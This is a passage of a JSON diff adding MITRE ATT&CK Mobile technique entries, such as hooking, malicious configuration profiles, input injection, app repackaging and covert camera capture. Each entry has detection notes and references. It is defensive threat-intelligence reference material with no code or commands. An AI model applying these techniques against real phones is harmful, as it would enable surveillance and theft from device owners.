"url": "https://attack.mitre.org/techniques/T1634", + "external_id": "T1634" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "external_id": "AUT-11" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Hooking", + 
"description": "Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Jörg Abraham, EclecticIQ" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "created": "2021-09-24T14:47:34.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1617", + "external_id": "T1617" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": 
"attack-pattern--cde2cb84-455e-410c-8aa9-086f2788bcd2", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1478", + "url": "https://attack.mitre.org/techniques/T1478" + }, + { + "source_name": "Talos-MDM", + "url": "https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html", + "description": "Warren Mercer, Paul Rascagneres, Andrew Williams. (2018, July 12). Advanced Mobile Malware Campaign in India uses Malicious MDM. Retrieved September 24, 2018." + }, + { + "source_name": "Symantec-iOSProfile", + "url": "https://www.symantec.com/connect/blogs/malicious-profiles-sleeping-giant-ios-security", + "description": "Yair Amit. (2013, March 12). Malicious Profiles – The Sleeping Giant of iOS Security. Retrieved September 24, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. 
The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).\n\nFor example, an unwanted Certification Authority (CA) certificate could be placed in the device's trusted certificate store, increasing the device's susceptibility to adversary-in-the-middle network attacks seeking to eavesdrop on or manipulate the device's network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)).\n\nOn iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device's network traffic through an adversary's system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).", + "modified": "2022-03-30T18:18:15.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Install Insecure or Malicious Configuration", + "x_mitre_detection": "On Android, the user can view trusted CA certificates through the device settings and look for unexpected certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies.\n\nOn iOS, the user can view installed Configuration Profiles through the device settings and look for unexpected profiles. 
A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + }, + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:35.087Z", + "name": "File and Directory Discovery", + "description": "Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions. \n\nOn Android, Linux file permissions and SELinux policies typically stringently restrict what can be accessed by apps without taking advantage of a privilege escalation exploit. The contents of the external storage directory are generally visible, which could present concerns if sensitive data is inappropriately stored there. iOS's security architecture generally restricts the ability to perform any type of [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users are presented with a permissions popup when an application requests access to external device storage.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "created": "2017-10-25T14:48:21.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1420", + "external_id": "T1420" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html", + "external_id": "STA-41" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "created": "2017-10-25T14:48:32.328Z", + "x_mitre_version": "3.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1406", + "url": "https://attack.mitre.org/techniques/T1406" + }, + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. 
Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-21" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n \nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB) ", + "modified": "2022-04-06T12:36:31.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscated Files or Information", + "x_mitre_detection": "Dynamic analysis, when used in application vetting, may in some cases be able to identify malicious code in obfuscated or encrypted form by detecting the code at execution time (after it is deobfuscated or decrypted). 
Some application vetting techniques apply reputation analysis of the application developer and can alert to potentially suspicious applications without actual examination of application code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Input Injection", + "description": "A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.\n\n[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:\n\n* Mimicking user clicks on the screen, for example to steal money from a user's PayPal account.(Citation: android-trojan-steals-paypal-2fa)\n* Injecting global actions, such as `GLOBAL_ACTION_BACK` (programatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)\n* Inserting input into text fields on behalf of the user. 
This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Users can view applications that have registered accessibility services in the accessibility menu within the device settings.", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Lukáš Štefanko, ESET" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "created": "2019-09-15T15:26:22.356Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1516", + "external_id": "T1516" + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + }, + { + "source_name": "bitwarden autofill logins", + "description": "Bitwarden. (n.d.). Auto-fill logins on Android . 
Retrieved September 15, 2019.", + "url": "https://help.bitwarden.com/article/auto-fill-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:51:23.109Z", + "name": "Network Denial of Service", + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices. \n\nA Network DoS will occur when an adversary is able to jam radio signals (e.g. Wi-Fi, cellular, GPS) around a device to prevent it from communicating. For example, to jam cellular signal, an adversary may use a handheld signal jammer, which jam devices within the jammer’s operational range.(Citation: NIST-SP800187) \n\nUsage of cellular jamming has been documented in several arrests reported in the news.(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Unexpected loss of radio signal could indicate that a device is being actively jammed.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", + "created": "2017-10-25T14:48:25.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/techniques/T1464", + "external_id": "T1464" + }, + { + "source_name": "CNET-Celljammer", + "description": "Chris Matyszczyk. (2014, May 1). FCC: Man used device to jam drivers' cell phone calls. Retrieved November 8, 2018.", + "url": "https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/" + }, + { + "source_name": "Arstechnica-Celljam", + "description": "David Kravets. (2016, March 10). Man accused of jamming passengers’ cell phones on Chicago subway. Retrieved November 8, 2018.", + "url": "https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/" + }, + { + "source_name": "NIST-SP800187", + "description": "Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017.", + "url": "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf" + }, + { + "source_name": "NYTimes-Celljam", + "description": "Matt Richtel. (2007, November 4). Devices Enforce Silence of Cellphones, Illegally. Retrieved November 8, 2018.", + "url": "https://www.nytimes.com/2007/11/04/technology/04jammer.html" + }, + { + "source_name": "Digitaltrends-Celljam", + "description": "Trevor Mogg. (2015, June 5). Florida teacher punished after signal-jamming his students’ cell phones. 
Retrieved November 8, 2018.", + "url": "https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html", + "external_id": "CEL-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html", + "external_id": "CEL-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html", + "external_id": "LPN-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html", + "external_id": "GPS-0" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Compromise Application Executable", + "description": "Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.\n\nThere are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file's signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user's knowledge.(Citation: Guardsquare Janus)\n\nAdversaries may also rebuild applications to include malicious modifications. 
This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)\n\nAdversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "This behavior is seamless to the user and is typically undetectable.", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "created": "2020-05-07T15:24:49.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1577", + "external_id": "T1577" + }, + { + "source_name": "Guardsquare Janus", + "description": "Guarsquare. (2017, November 13). New Android vulnerability allows attackers to modify apps without affecting their signatures. Retrieved May 7, 2020.", + "url": "https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures" + }, + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. 
Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:43:46.177Z", + "name": "Event Triggered Execution", + "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via automatically and repeatedly executing malicious code. After gaining access to a victim’s system, adversaries may create or modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "created": "2022-03-30T14:25:41.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1624", + "external_id": "T1624" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:50:32.697Z", + "name": "System Network Configuration Discovery", + "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems. \n\n \n\nOn Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) \n\n \n\nOn iOS, gathering network configuration information is not possible without root access. 
\n\n \n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for usage of the `READ_PRIVILEGED_PHONE_STATE` Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "created": "2017-10-25T14:48:32.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1422", + "external_id": "T1422" + }, + { + "source_name": "NetworkInterface", + "description": "Android. (n.d.). NetworkInterface. Retrieved December 21, 2016.", + "url": "https://developer.android.com/reference/java/net/NetworkInterface.html" + }, + { + "source_name": "TelephonyManager", + "description": "Android. (n.d.). TelephonyManager. 
Retrieved December 21, 2016.", + "url": "https://developer.android.com/reference/android/telephony/TelephonyManager.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63", + "created": "2017-10-25T14:48:25.322Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1463", + "url": "https://attack.mitre.org/techniques/T1463" + }, + { + "source_name": "FireEye-SSL", + "url": "https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html", + "description": "Adrian Mettler, Yulong Zhang, Vishwanath Raman. (2014, August 20). SSL VULNERABILITIES: WHO LISTENS WHEN ANDROID APPLICATIONS TALK?. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. 
For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).", + "modified": "2022-04-06T15:44:48.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Manipulate Device Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:38:27.848Z", + "name": "Video Capture", + "description": "An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files. \n\n \n\nMalware or scripts may interact with the device cameras through an available API provided by the operating system. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due to use of the device’s cameras for video recording rather than capturing the victim’s screen. \n\n \n\nIn Android, an application must hold the `android.permission.CAMERA` permission to access the cameras. In iOS, applications must include the `NSCameraUsageDescription` key in the `Info.plist` file. In both cases, the user must grant permission to the requesting application to use the camera. If the device has been rooted or jailbroken, an adversary may be able to access the camera without knowledge of the user. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "created": "2019-08-09T16:14:58.254Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1512", + "external_id": "T1512" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:34.118Z", + "name": "One-Way Communication", + "description": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. 
Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "created": "2022-04-06T15:52:07.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481/003", + "external_id": "T1481.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + 
"mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d9db3d46-66ca-44b4-9daa-1ef97cb7465a", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1475", + "url": "https://attack.mitre.org/techniques/T1475" + }, + { + "source_name": "Oberheide-Bouncer", + "url": "https://jon.oberheide.org/files/summercon12-bouncer.pdf", + "description": "Jon Oberheide and Charlie Miller. (2012). Dissecting the Android Bouncer. Retrieved December 12, 2016." + }, + { + "source_name": "Oberheide-RemoteInstall", + "url": "https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/", + "description": "Jon Oberheide. (2010, June 25). Remote Kill and Install on Google Android. Retrieved December 12, 2016." + }, + { + "source_name": "Percoco-Bouncer", + "url": "https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf", + "description": "Nicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved December 12, 2016." + }, + { + "source_name": "Konoth", + "url": "http://www.vvdveen.com/publications/BAndroid.pdf", + "description": "Radhesh Krishnan Konoth, Victor van der Veen, and Herbert Bos. (n.d.). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved December 12, 2016." + }, + { + "source_name": "Petsas", + "url": "http://dl.acm.org/citation.cfm?id=2592796", + "description": "Thanasis Petsas, Giannis Voyatzis, Elias Athanasopoulos, Michalis Polychronakis, Sotiris Ioannidis. (2014, April). Rage Against the Virtual Machine: Hindering Dynamic Analysis of Android Malware. Retrieved December 12, 2016." 
